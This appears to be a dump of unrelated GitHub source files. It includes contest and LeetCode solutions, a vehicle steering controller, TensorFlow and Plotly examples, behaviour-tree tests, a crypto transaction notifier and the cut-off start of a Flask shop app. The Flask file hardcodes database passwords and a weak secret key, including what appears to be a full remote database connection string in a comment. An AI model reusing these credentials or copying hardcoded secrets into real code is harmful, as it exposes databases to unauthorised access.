bpy.utils.unregister_tool(t)\n","repo_name":"nepia11/weight_control","sub_path":"lib/ops_weight_control.py","file_name":"ops_weight_control.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18570933643","text":"from heapq import heappop, heappush\n\n\ndef solve(n, m, k, uva_list, s_list):\n dist = [10 * n] * (2 * n + 1)\n g = [[] for _ in range(2 * n + 1)]\n for u, v, a in uva_list:\n if a == 1:\n g[u].append(v)\n g[v].append(u)\n else:\n g[u + n].append(v + n)\n g[v + n].append(u + n)\n for s in s_list:\n g[s].append(s + n)\n g[s + n].append(s)\n\n h = []\n dist[1] = 0\n heappush(h, (0, 1))\n\n while len(h) > 0:\n d, p = heappop(h)\n for q in g[p]:\n if abs(p - q) == n:\n if dist[q] > d:\n dist[q] = d\n heappush(h, (d, q))\n else:\n if dist[q] > d + 1:\n dist[q] = d + 1\n heappush(h, (d + 1, q))\n res = min(dist[n], dist[2 * n])\n if res == 10 * n:\n res = -1\n return res\n\n\ndef main():\n n, m, k = map(int, input().split())\n uva_list = [tuple(map(int, input().split())) for _ in range(m)]\n s_list = list(map(int, input().split()))\n res = solve(n, m, k, uva_list, s_list)\n print(res)\n\n\ndef test():\n assert solve(5, 5, 2, [(1, 3, 0), (2, 3, 1), (5, 4, 1), (2, 1, 1), (1, 4, 0)], [3, 4]) == 5\n assert solve(4, 4, 2, [(4, 3, 0), (1, 2, 1), (1, 2, 0), (2, 2, 1)], [2, 4]) == -1\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC251-300/ABC277/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"2592642895","text":"\"\"\"\n/******************************************************************************\nLicense: GNU General Public License v2.0\nFile name: stanley.py\nAuthor: LiXianQiang Date:2021/05/11 Version: 0.0.1\nDescription: Stanley车辆横向控制算法实现\nClass List:\n Class Stanley\n __init__(self, k_gain, bodyLen, max_steerAngle): 控制器初始化\n CalculateFrontWheelPoseWith(self, rearWheelPose):\n controller(self, refPose, currPose, currVel, reverse): 车辆横向控制器\nFunction List:\nHistory:\n \n LiXianQiang 2021/05/11 0.0.1 Stanley车辆横向控制算法实现\n******************************************************************************/\n\"\"\"\nimport math\nimport numpy as np\n\n\nclass Stanley:\n \"\"\"Stanley车辆横向控制算法\n\n 属于前轮反馈控制算法\n\n 参考链接: https://blog.csdn.net/renyushuai900/article/details/98460758\n https://blog.csdn.net/caokaifa/article/details/91483376\n https://www.bilibili.com/video/BV1rE411J7Gz\n\n 参考论文: <>\n \"\"\"\n\n def __init__(self, k_gain, bodyLen, max_steerAngle):\n \"\"\"控制器初始化\n\n Args:\n k_gain: float类, 增益系数\n bodyLen: float类, 车身长度\n max_steerAngle: float类, 最大转向角, 弧度制\n \"\"\"\n self.k_gain = k_gain\n self.bodyLen = bodyLen\n self.max_steerAngle = max_steerAngle\n\n def CalculateFrontWheelPoseWith(self, rearWheelPose):\n \"\"\"通过后轮位置计算前轮位置\n\n Args:\n rearWheelPose: list类 后轮位姿 (包括:后轮中心位置以及车辆航行角)\n rearWheelPose[0]: float类 后轮中心的 x 轴\n rearWheelPose[1]: float类 后轮中心的 y 轴\n rearWheelPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n Returns:\n frontWheelPose: list类 前轮位姿 (包括:前轮中心位置以及车辆航行角)\n frontWheelPose[0]: float类 前轮中心的 x 轴\n frontWheelPose[1]: float类 前轮中心的 y 轴\n frontWheelPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n \"\"\"\n frontWheelPose = []\n frontWheelPose[0] = rearWheelPose[0] + self.bodyLen * np.cos(rearWheelPose[2])\n frontWheelPose[1] = rearWheelPose[1] + self.bodyLen * np.sin(rearWheelPose[2])\n frontWheelPose[2] = rearWheelPose[2]\n return frontWheelPose\n\n def controller(self, refPose, currPose, currVel, reverse=False):\n \"\"\"车辆横向控制器\n\n 关于算法的实现原理与介绍, 请查阅参考资料\n\n 需要强调一点:\n 根据参考论文的描述, 算法是基于运动学模型而设计, 因此没有考虑车辆惯性的影响:\n 轮胎的侧偏以及转向伺服执行器的时延, 因此仅适用低速场景下. 但论文中通过对干扰项\n 进行补偿的方式实现, 也给出了适用于动力学模型的Stanley车辆横向控制器\n\n Args:\n refPose: list类 参考点位姿 关于参考点的选择: 一般选择轨迹中距离前轮中心\n 最近的一点,该点也叫最近路径点\n refPos[0]: float类 参考点的 x 轴\n refPos[1]: float类 参考点的 y 轴\n refPos[2]: float类 参考点的切线角(即:切线与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n currPose: list类 当前位姿(即:前轮中心位置以及车辆航行角)\n currPose[0]: float类 前轮中心的 x 轴\n currPose[1]: float类 前轮中心的 y 轴\n currPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n currVel: float类 当前速度(即:前轮中心的速度)简化情况下,\n 可以将其视作车辆质心位置速度/后轮速度\n reverse: bool类 车辆的行驶方向, 默认缺省值 False\n True 为 倒车行驶\n Flase 为 正向行驶\n\n Returns:\n diffAngle: float类, 前轮转向角输出值\n \"\"\"\n\n def AngleDiff(endAngle, startAngle):\n \"\"\"计算两个角之间的最小转向夹角\n\n 从起始角 startAngle 指向终止角 endAngle,即:endAngle - startAngle,\n 旋转方向的正负方向判断: 逆时针方向为正, 顺时针方向为负\n\n Args:\n endAngle: 终止角, 有效数值范围 [pi,-pi)\n startAngle: 起始角, 有效数值范围 [pi,-pi)\n\n Returns:\n diffAngle: 输出的转向角 有效数值范围 [pi,-pi)\n \"\"\"\n deltaAngle = endAngle - startAngle\n abs_deltaAngle = math.fabs(deltaAngle)\n abs_compleAngle = 2 * math.pi - abs_deltaAngle\n\n # 当旋转夹角在数值上大于补角时, 选择沿着补角进行旋转\n if abs_compleAngle < abs_deltaAngle:\n # 当 deltaAngle < 0 表示起始角一开始是以顺时针方向旋转, 并旋转到终止角,\n # 若沿着补角一侧进行旋转, 起始角则是以逆时针方向旋转, 并旋转到终止角\n # 当 deltaAngle > 0 表示起始角一开始是以逆时针方向旋转, 并旋转到终止角,\n # 若沿着补角一侧进行旋转, 起始角则是以顺时针方向旋转, 并旋转到终止角\n # 那么, (带方向)旋转夹角大小 = 正负方向 * 数值大小(补角的绝对值)\n diffAngle = -1 * np.sign(deltaAngle) * abs_compleAngle\n else:\n diffAngle = deltaAngle\n return diffAngle\n\n currPose = np.array([currPose]).T\n refPose = np.array([refPose]).T\n # 构建垂直于车辆的法向量\n yaw = currPose[2]\n # 模长为1的法向量\n normVec = np.array([[1 * math.cos(yaw + math.pi / 2)], [1 * math.sin(yaw + math.pi / 2)]])\n # 通过将误差向量投影到法向量,可以得到带符号的横向误差,\n LateralError = normVec.T @ (refPose[:2] - currPose[:2])\n\n # 根据论文描述, 当速度很低的时候, arctan(k*e/vel) 中的 k*e/vel 会变得很大,\n # 这时候它对横向(跟踪)误差会变得特别敏感, 因此在分母中加入 k_soft 使得\n # 小车在速度很低时也能正常运作\n k_soft = 1\n\n # 航向误差:参考点的切线角与车辆航向角所成夹角\n headingError = AngleDiff(refPose[2], currPose[2])\n\n # TODO 这里的currVel应该是前轮速度,这里暂时使用后轮速度代替\n # 横向控制控制律\n delta = headingError + math.atan2(self.k_gain * LateralError, k_soft + currVel)\n\n # 车辆转向的物理约束\n if abs(delta) > self.max_steerAngle:\n diffAngle = np.sign(delta) * self.max_steerAngle\n else:\n diffAngle = delta\n\n return diffAngle","repo_name":"lixianqiang/robotics_algorithm","sub_path":"control/stanley/python/script/stanley.py","file_name":"stanley.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28584025453","text":"\"\"\"\n给你两个单链表的头节点 headA 和 headB ,请你找出并返回两个单链表相交的起始节点。\n如果两个链表不存在相交节点,返回 null 。\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n \"\"\"\n 链表headA 和 headB 的长度分别是 m 和 n。\n 假设链表 headA 的不相交部分有 a个节点,链表 headB 的不相交部分有 b 个节点,两个链表相交的部分有 c 个节点,\n 则有 a + c = m,b + c = n。\n \"\"\"\n\n # 核心:两条链表,2个指针,不同出发点,同时走一遍 两条链表,若是有相交处,相遇2次,无相交处,相遇一次,即为None。\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # 边界:存在 空链表。\n if not headA or not headB:\n return None\n p, q = headA, headB\n while p != q:\n p = p.next if p else headB\n q = q.next if q else headA\n return p\n # 相交,则必存在 从某处开始节点地址一直相同。\n # 当链表A走到最后,从B开始遍历,若在A存在相同节点,则满足条件。\n # 核心:相同问题,借助哈希。\n # def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # # 边界:存在 空链表。\n # if not headA or not headB:\n # return None\n # hash_a_set = set()\n # p, q = headA, headB\n # while p:\n # hash_a_set.add(p)\n # p = p.next\n #\n # while q:\n # if q in hash_a_set:\n # return q\n # q = q.next\n # return None\n # 相交,则必存在 从某处开始节点地址一直相同。\n # 当链表A和链表B都走到最后,相交时必定地址相同,一直回溯到地址不同的时刻,其最后一次相同的时刻即相交处。\n # 核心:回溯——借助 栈。\n # def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # # 边界:存在 空链表。\n # if not headA or not headB:\n # return None\n #\n # stack_A_list = []\n # stack_B_list = []\n # p, q = headA, headB\n # while p:\n # stack_A_list.append(p)\n # p = p.next\n # while q:\n # stack_B_list.append(q)\n # q = q.next\n # insert_node = None\n # while len(stack_A_list) > 0 and len(stack_B_list) > 0 and stack_A_list[-1] == stack_B_list[-1]:\n # insert_node = stack_A_list.pop()\n # stack_B_list.pop()\n #\n # return insert_node\n","repo_name":"zcPasser/leetcode_python","sub_path":"first_leetcode/py160_intersection-of-two-linked-lists.py","file_name":"py160_intersection-of-two-linked-lists.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2717682261","text":"# Linear Regression on Tensorflow\n\n# Imports\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass TFLinearRegression():\n \n def __init__(self,X,Y): \n self.X=X\n self.Y=Y\n # Setting the placeholders which will be inputs\n self.x=tf.placeholder(\"float32\",(None,X.shape[1]))\n self.y=tf.placeholder(\"float32\",(None,1))\n\n # Setting up the Variables\n self.w=tf.Variable(tf.random_uniform([X.shape[1],1]))\n self.b=tf.Variable(tf.random_uniform([1]))\n\n # Output\n self.output=tf.add(tf.matmul(self.x,self.w),self.b)\n\n # Optimizer\n self.loss=tf.reduce_mean(tf.pow(self.output - self.y,2))\n self.optimizer=tf.train.GradientDescentOptimizer(0.1).minimize(self.loss)\n self.init=tf.global_variables_initializer()\n \n\n def train(self):\n # Train of Tensorflow\n # Run the session\n with tf.Session() as sess:\n sess.run(self.init)\n for runCounter in range(10000):\n _,l=sess.run([self.optimizer,self.loss],feed_dict={self.x:self.X,self.y:self.Y.reshape(self.X.shape[0],1)})\n if(runCounter % 100==0):\n print(\"The loss after {} is {}\".format(runCounter,l))\n weights,bias=sess.run([self.w,self.b],feed_dict={self.x:self.X,self.y:self.Y.reshape(self.X.shape[0],1)}) \n return({\"weights\":weights,\"bias\":bias})\n\n def compareWithSklearnLinearRegression(self):\n lrModel=LinearRegression()\n lrModel.fit(self.X,self.Y)\n return({\"weights\":lrModel.coef_,\"bias\":lrModel.intercept_})\n \n \nif __name__==\"__main__\":\n \n # Read/Prepare the data\n data=np.random.rand(100,5)\n \n lr=TFLinearRegression(data[:,0:4],data[:,4])\n results=lr.train()\n print(results)\n sklearn_results=lr.compareWithSklearnLinearRegression()\n print(sklearn_results)\n \n \n","repo_name":"anantguptadbl/python","sub_path":"tensorflow-examples/regression/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"10085180761","text":"\"\"\"Verifying the decomposition of LTL into BT.\"\"\"\n\nfrom utils import (\n goalspec2BT, recursive_until, LTLNode, post_tick_until, ConditionNode)\n# from pygoal.utils.bt import goalspec2BT, recursive_until\nfrom py_trees.trees import BehaviourTree\nimport py_trees\n\n\ndef decompose():\n # goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==]'\n # goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==] U P_[KB][1,none,==]'\n # goalspec = 'P_[KA][1,none,==] U P_[KB][1,none,==] U P_[KC][1,none,==] U P_[KD][1,none,==], U P_[KE][1,none,==]'\n goalspec = '(F(P_[KE][1,none,==]) U G(P_[KA][1,none,==]))'\n # goalspec = '(P_[KA][1,none,==] & P_[KB][1,none,==]) U (P_[KC][1,none,==] & P_[KD][1,none,==])'\n # goalspec = '((P_[KA][1,none,==] U P_[KB][1,none,==]) & (P_[KC][1,none,==] U P_[KD][1,none,==])) & (P_[KE][1,none,==] & P_[KF][1,none,==])'\n root = goalspec2BT(goalspec, planner=None)\n # for i in root.iterate():\n # print(i.id, i.name)\n behaviour_tree = BehaviourTree(root)\n # bt = UntilNode('U')\n py_trees.logging.level = py_trees.logging.Level.DEBUG\n output = py_trees.display.ascii_tree(behaviour_tree.root)\n print(output)\n recursive_until(root)\n output = py_trees.display.ascii_tree(behaviour_tree.root)\n print(output)\n\n\ndef test_decompose_tick():\n goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==]'\n root = goalspec2BT(goalspec, planner=None, node=LTLNode)\n # py_trees.logging.level = py_trees.logging.Level.DEBUG\n behaviour_tree = BehaviourTree(root)\n recursive_until(root)\n # output = py_trees.display.ascii_tree(behaviour_tree.root)\n # print(output)\n return behaviour_tree\n\n\ndef test_multiple_ticks():\n ticks = [\n [False, True],\n [False, False],\n [True, False],\n [True, True]\n ]\n for tick in ticks:\n behavior_tree = test_decompose_tick()\n ltlnode = [\n node for node in behavior_tree.root.iterate() if isinstance(\n node, LTLNode)]\n # Now we have a behavior tree. Lets define the tick\n # This order is important for testing only. In real\n # setting the status of the node is used\n ltlnode[0].value, ltlnode[1].value = tick[1], tick[0]\n behavior_tree.tick()\n print(behavior_tree.root.status, tick)\n\n ticks1 = [\n [True, False],\n [True, True]\n ]\n ticks2 = [\n [True, False],\n [False, True]\n ]\n ticks3 = [\n [True, False],\n [False, False]\n ]\n ticks4 = [\n [True, False],\n [True, False]\n ]\n ticks5 = [\n [True, False],\n [False, False],\n [True, False],\n [True, True],\n ]\n\n ticks = [ticks1, ticks2, ticks3, ticks4, ticks5]\n for tick in ticks:\n behavior_tree = test_decompose_tick()\n ltlnode = [\n node for node in behavior_tree.root.iterate() if isinstance(\n node, LTLNode)]\n # Now we have a behavior tree. Lets define the tick\n for i in range(len(tick)):\n ltlnode[0].value, ltlnode[1].value = tick[i][1], tick[i][0]\n # print(ltlnode[0].value, ltlnode[1].value)\n behavior_tree.tick()\n # print(i, behavior_tree.root.status, tick[i])\n post_tick_until(behavior_tree.root)\n print(behavior_tree.root.status, tick)\n\n\ndef test_pf():\n r = ConditionNode('root', None)\n r = BehaviourTree(r)\n r.tick()\n print(r.root.status)\n\n\ndef main():\n # decompose()\n # test_decompose_tick()\n # test_multiple_ticks()\n test_pf()\n\n\ndef older():\n # from examples.decompose.utils import DummyNode\n\n from flloat.parser.ltlf import LTLfParser\n\n # parse the formula\n parser = LTLfParser()\n # formula = \"r U (t U (b U p))\" # F(b) U F(p)\"\n # formula = \"p U (b U (t U r))\"\n formula = \"((F r U t) U F b) U F p\"\n parsed_formula = parser(formula)\n print(parsed_formula)\n # evaluate over finite traces\n t1 = [\n {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n {\"r\": False, \"t\": True, \"b\": False, \"p\": False},\n {\"r\": False, \"t\": False, \"b\": True, \"p\": False},\n {\"r\": False, \"t\": False, \"b\": False, \"p\": True},\n ]\n # t1 = [\n # {\"r\": False, \"t\": True, \"b\": False, \"p\": False},\n # {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": False, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": True, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": False, \"p\": True}\n # ]\n\n print('t1', parsed_formula.truth(t1, 0))\n\n # t2 = [\n # {\"a\": False, \"b\": False},\n # {\"a\": True, \"b\": True},\n # {\"a\": False, \"b\": True},\n # ]\n # assert not parsed_formula.truth(t2, 0)\n\n # # from LTLf formula to DFA\n dfa = parsed_formula.to_automaton()\n # print(dir(dfa))\n print(dfa.get_transitions(), dfa.size)\n # assert dfa.accepts(t1)\n # assert not dfa.accepts(t2)\n\n # # print the automaton\n graph = dfa.to_graphviz()\n graph.render(\"./1\") # requires Graphviz installed on your system.\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aadeshnpn/PyGoal","sub_path":"examples/decompose/decomp.py","file_name":"decomp.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6449460079","text":"import datetime\nimport time\n\nfrom pip import main\n\n\ndef getYesterday():\n now = datetime.date.today()\n return now + datetime.timedelta(-1)\n\nprint('yesterday:',getYesterday())\n\n\nticks = time.time()\nprint (\"当前时间戳为:\", ticks)\n\n\nlocaltime = time.localtime(time.time())\nprint (\"本地时间为 :\", localtime)\n\n# 格式化成2016-03-20 11:45:39形式\nprint (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n\n# 格式化成Sat Mar 28 22:24:24 2016形式\nprint (time.strftime(\"%a %b %d %H:%M:%S %Y\", time.localtime()))\n \n# 将格式字符串转换为时间戳\na = \"Sat Mar 28 22:24:24 2016\"\nprint (time.mktime(time.strptime(a,\"%a %b %d %H:%M:%S %Y\")))\n ","repo_name":"Aostle/python","sub_path":"exercise/日期.py","file_name":"日期.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42445275347","text":"import asyncio\nfrom contextlib import suppress\nfrom typing import List\n\nfrom aioredis import Redis\n\nfrom services.jobs.scanner.event_db import EventDatabase\nfrom services.lib.config import SubConfig\nfrom services.lib.date_utils import parse_timespan_to_seconds\nfrom services.lib.delegates import INotified, WithDelegates\nfrom services.lib.depcont import DepContainer\nfrom services.lib.money import Asset, DepthCurve, pretty_dollar\nfrom services.lib.utils import class_logger\nfrom services.models.tx import ThorTx, EventLargeTransaction\nfrom services.models.tx_type import TxType\nfrom services.notify.types.cap_notify import LiquidityCapNotifier\n\n\nclass GenericTxNotifier(INotified, WithDelegates):\n def __init__(self, deps: DepContainer, params: SubConfig, tx_types, curve: DepthCurve):\n super().__init__()\n self.deps = deps\n self.params = params\n self.tx_types = tx_types\n self.logger = class_logger(self)\n self.max_tx_per_single_message = deps.cfg.as_int('tx.max_tx_per_single_message', 5)\n\n self.curve = curve\n self.curve_mult = params.as_float('curve_mult', 1.0)\n\n self.max_age_sec = parse_timespan_to_seconds(deps.cfg.tx.max_age)\n self.min_usd_total = int(params.min_usd_total)\n self.no_repeat_protection = True\n\n DB_KEY_ANNOUNCED_TX_ID = 'tx:announced-hashes'\n\n async def mark_as_announced(self, tx_id, clear=False):\n if not tx_id:\n return\n\n r: Redis = self.deps.db.redis\n if clear:\n await r.srem(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n else:\n await r.sadd(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n\n async def is_announced(self, tx_id):\n if not tx_id:\n return True\n\n r: Redis = self.deps.db.redis\n return await r.sismember(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n\n async def on_data(self, senders, txs: List[ThorTx]):\n with suppress(Exception):\n await self.handle_txs_unsafe(senders, txs)\n\n async def handle_txs_unsafe(self, senders, txs: List[ThorTx]):\n txs = [tx for tx in txs if tx.type in self.tx_types] # filter my TX types\n\n if self.no_repeat_protection:\n flags = await asyncio.gather(*[self.is_announced(tx.tx_hash) for tx in txs])\n tmp_txs = []\n for flag, tx in zip(flags, txs):\n if flag:\n self.logger.warning(f'Tx {tx.tx_hash} ({tx.type}) has been already announced. Ignore!')\n else:\n tmp_txs.append(tx)\n txs = tmp_txs\n\n if not txs:\n return\n\n usd_per_rune = self.deps.price_holder.usd_per_rune\n if not usd_per_rune:\n self.logger.error(f'Can not filter Txs, no USD/Rune price')\n return\n\n min_rune_volume = self.min_usd_total / usd_per_rune\n\n large_txs = [tx for tx in txs if self.is_tx_suitable(tx, min_rune_volume, usd_per_rune)]\n large_txs = large_txs[:self.max_tx_per_single_message] # limit for 1 notification\n\n if not large_txs:\n return\n\n self.logger.info(f\"Large Txs count is {len(large_txs)}.\")\n\n cap_info = await LiquidityCapNotifier.get_last_cap_from_db(self.deps.db)\n has_liquidity = any(tx.is_liquidity_type for tx in large_txs)\n\n for tx in large_txs:\n is_last = tx == large_txs[-1]\n pool_info = self.deps.price_holder.pool_info_map.get(tx.first_pool_l1)\n await self.pass_data_to_listeners(EventLargeTransaction(\n tx, usd_per_rune,\n pool_info,\n cap_info=(cap_info if has_liquidity and is_last else None),\n mimir=self.deps.mimir_const_holder\n ))\n\n if self.no_repeat_protection:\n await self.mark_as_announced(tx.tx_hash)\n\n def _get_min_usd_depth(self, tx: ThorTx, usd_per_rune):\n pools = tx.pools\n if not pools:\n # in case of refund maybe\n pools = [tx.first_input_tx.first_asset]\n\n pools = [Asset.to_L1_pool_name(p) for p in pools]\n\n pool_info_list = list(filter(bool, (self.deps.price_holder.pool_info_map.get(pool) for pool in pools)))\n if not pool_info_list:\n return 0.0\n min_pool_depth = min(p.usd_depth(usd_per_rune) for p in pool_info_list)\n return min_pool_depth\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n pool_usd_depth = self._get_min_usd_depth(tx, usd_per_rune)\n if pool_usd_depth == 0.0:\n if tx.type != TxType.REFUND:\n self.logger.warning(f'No pool depth for Tx: {tx}.')\n min_share_rune_volume = 0.0\n else:\n if self.curve:\n curve_mult = curve_mult or self.curve_mult\n min_pool_share = self.curve.evaluate(pool_usd_depth) * curve_mult\n min_share_rune_volume = pool_usd_depth / usd_per_rune * min_pool_share\n else:\n min_share_rune_volume = 0.0\n\n if tx.full_rune >= min_rune_volume and tx.full_rune >= min_share_rune_volume:\n return True\n\n def dbg_evaluate_curve_for_pools(self, max_pools=20):\n pools = sorted(self.deps.price_holder.pool_info_map.values(), key=lambda p: p.balance_rune, reverse=True)\n usd_per_rune = self.deps.price_holder.usd_per_rune\n\n summary = \" --- Threshold curve evaluation ---\\n\"\n for pool in pools[:max_pools]:\n if pool.asset.startswith('THOR'): # no virtuals\n continue\n depth_usd = pool.usd_depth(usd_per_rune)\n min_pool_share = self.curve.evaluate(depth_usd) * self.curve_mult\n min_share_usd_volume = depth_usd * min_pool_share\n summary += f\"Pool: {pool.asset[:20]:<20} => Min Tx volume is {pretty_dollar(min_share_usd_volume)}\\n\"\n self.logger.info(summary)\n\n\nclass LiquidityTxNotifier(GenericTxNotifier):\n def __init__(self, deps: DepContainer, params: SubConfig, curve: DepthCurve):\n super().__init__(deps, params, (TxType.WITHDRAW, TxType.ADD_LIQUIDITY), curve)\n self.ilp_paid_min_usd = params.as_float('also_trigger_when.ilp_paid_min_usd', 6000)\n\n self.savers_enabled = params.get('savers.enabled', True)\n self.savers_min_usd_total = params.as_float('savers.min_usd_total', 10_000.0)\n self.savers_curve_mult = params.as_float('savers.curve_mult', 0.4)\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n if tx.meta_withdraw and (tx.meta_withdraw.ilp_rune >= self.ilp_paid_min_usd / usd_per_rune):\n return True\n\n if tx.is_savings:\n min_rune_volume_savers = self.savers_min_usd_total / usd_per_rune\n if super().is_tx_suitable(tx, min_rune_volume_savers, usd_per_rune, self.savers_curve_mult):\n return True\n\n return super().is_tx_suitable(tx, min_rune_volume, usd_per_rune, curve_mult)\n\n\nclass SwapTxNotifier(GenericTxNotifier):\n def __init__(self, deps: DepContainer, params: SubConfig, curve: DepthCurve):\n super().__init__(deps, params, (TxType.SWAP,), curve)\n self.dex_min_usd = params.as_float('also_trigger_when.dex_aggregator_used.min_usd_total', 500)\n self.aff_fee_min_usd = params.as_float('also_trigger_when.affiliate_fee_usd_greater', 500)\n self.min_streaming_swap_usd = params.as_float('also_trigger_when.streaming_swap.volume_greater', 2500)\n self._txs_started = [] # Fill it every tick before is_tx_suitable is called.\n self._ev_db = EventDatabase(deps.db)\n\n async def _check_if_they_announced_as_started(self, txs: List[ThorTx]):\n if not txs:\n return\n\n tx_ids = [tx.tx_hash for tx in txs]\n\n flags = await asyncio.gather(\n *[self._ev_db.is_announced_as_started(tx_id) for tx_id in tx_ids]\n )\n self._txs_started = [tx_id for tx_id, flag in zip(tx_ids, flags) if flag]\n if self._txs_started:\n self.logger.info(f'These Txs were announced as started SS: {self._txs_started}')\n\n async def handle_txs_unsafe(self, senders, txs: List[ThorTx]):\n await self._check_if_they_announced_as_started(txs)\n\n return await super().handle_txs_unsafe(senders, txs)\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n # a) It is interesting if a steaming swap\n if tx.is_streaming:\n if tx.full_rune >= self.min_streaming_swap_usd / usd_per_rune:\n return True\n\n # b) It is interesting if paid much to affiliate fee collector\n affiliate_fee_rune = tx.meta_swap.affiliate_fee * tx.full_rune\n if affiliate_fee_rune >= self.aff_fee_min_usd / usd_per_rune:\n return True\n\n # c) It is interesting if the Dex aggregator used\n if tx.dex_aggregator_used and tx.full_rune >= self.dex_min_usd / usd_per_rune:\n return True\n\n # d) If we announce that the streaming swap has started, then we should announce that it's finished,\n # regardless of its volume.\n if tx.tx_hash in self._txs_started:\n return True\n\n # e) Regular rules are applied\n return super().is_tx_suitable(tx, min_rune_volume, usd_per_rune, curve_mult)\n","repo_name":"tirinox/thorchainmonitorbot","sub_path":"app/services/notify/types/tx_notify.py","file_name":"tx_notify.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"35900615800","text":"# Import libraries and modules\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport pandas as pd\n\n# Read data\ndf_1 = pd.read_csv(\"2010SitkaAK.csv\")\ndf_2 = pd.read_csv(\"2010SantaBarbaraCA.csv\")\ndf_3 = pd.read_csv(\"2010YumaAZ.csv\")\n\n# Build traces\ntrace_1 = go.Heatmap(\n x = df_1[\"DAY\"],\n y = df_1[\"LST_TIME\"],\n z = df_1[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\ntrace_2 = go.Heatmap(\n x = df_2[\"DAY\"],\n y = df_2[\"LST_TIME\"],\n z = df_2[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\ntrace_3 = go.Heatmap(\n x = df_3[\"DAY\"],\n y = df_3[\"LST_TIME\"],\n z = df_3[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\n# Build the figure\nfig = tools.make_subplots(\n rows = 1,\n cols = 3,\n subplot_titles = [\"Sitka, AK\", \"Santa Barbara, CA\", \"Yuma, AZ\"],\n shared_yaxes = True\n)\n\nfig.append_trace(trace_1, 1, 1)\nfig.append_trace(trace_2, 1, 2)\nfig.append_trace(trace_3, 1, 3)\n\nfig[\"layout\"].update(\n title = \"Temperatures\"\n)\n\n# Save the plot\npyo.plot(fig, filename = \"03_multiple_heatmaps.html\")\n","repo_name":"daczarne/udemy_dash_course","sub_path":"03_plotly_basics/08_heatmap/03_multiple_heatmaps.py","file_name":"03_multiple_heatmaps.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"1681636902","text":"from re import U\nfrom flask import Flask, request, render_template, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\n\n\napp = Flask(__name__)\n\n# 'postgresql://:@:/\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost:5432/tienda'\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://oqeyqjxvtgabsw:b725feeade390b604b07cc18aa8aee5156bd63e64a25b9d2f14f4ae82f30fd13@ec2-54-161-189-150.compute-1.amazonaws.com:5432/dfacl5b6rvkdn5'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'some-secret-key'\n\ndb = SQLAlchemy(app)\n\n# Importar los modelos\n\nfrom models import Product, User, Invoice, Administrator\n\n# Crear esquema de la base de datos\n\ndb.create_all()\ndb.session.commit()\n\n# Rutas de Páginas\n\n@app.route(\"/\")\ndef get_home():\n return \"Este es el home\"\n\n# Ruta para crear el usuario\n\n@app.route(\"/register\")\ndef register():\n return render_template(\"register.html\")\n\n@app.route(\"/create_user\", methods=[\"POST\"])\ndef 